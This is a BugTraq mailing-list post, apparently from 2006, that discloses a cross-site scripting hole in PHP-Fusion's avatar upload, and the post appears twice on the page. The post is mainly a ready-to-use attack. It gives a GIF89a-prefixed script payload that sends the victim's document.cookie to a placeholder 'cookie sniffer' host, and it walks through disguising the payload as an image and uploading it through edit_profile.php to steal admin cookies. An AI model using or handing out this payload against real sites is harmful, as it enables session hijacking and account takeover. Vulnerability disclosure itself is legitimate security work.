Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Php-Fusion (Xss) With Avatar Upload
Jul 01 2006 10:26PM
zeberus_ hotmail com
Hi;
==================
http://php-fusion.co.uk/
==================
Php-Fusion (Xss) With Avatar Upload...
With This Vulnerability, You Are able To Become Any User Who Uses a Browser That
"internet Explorer"(Support Cross Site Scripting), So it is Possible To Become Admin.
Firefox Can't Write..
Admin or User Cookie We Are Able To Take
Php-Fusion İs Avatar Xss By Pass
=================
Our Xss Code :
GIF89a <script>img = new Image(); img.src = "Your Cookies Sniffer Adress Here?"+document.cookie;</script>
So Now We Will Open A NotPat And Put Our Code and Saved With .jpg .gif ....
And Upload A Php-Fusion Site.. http://[victim]/[Php-Fusion]/edit_profile.php
Credits ; ZeberuS & Redworm ZeberuS_ (at) hotmail (dot) com [email concealed] | Redworm (at) Redworm (dot) Us [email concealed] ;)
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
==================
http://php-fusion.co.uk/
==================
Php-Fusion (Xss) With Avatar Upload...
With This Vulnerability, You Are able To Become Any User Who Uses a Browser That
"internet Explorer"(Support Cross Site Scripting), So it is Possible To Become Admin.
Firefox Can't Write..
Admin or User Cookie We Are Able To Take
Php-Fusion İs Avatar Xss By Pass
=================
Our Xss Code :
GIF89a <script>img = new Image(); img.src = "Your Cookies Sniffer Adress Here?"+document.cookie;</script>
So Now We Will Open A NotPat And Put Our Code and Saved With .jpg .gif ....
And Upload A Php-Fusion Site.. http://[victim]/[Php-Fusion]/edit_profile.php
Credits ; ZeberuS & Redworm ZeberuS_ (at) hotmail (dot) com [email concealed] | Redworm (at) Redworm (dot) Us [email concealed] ;)
[ reply ]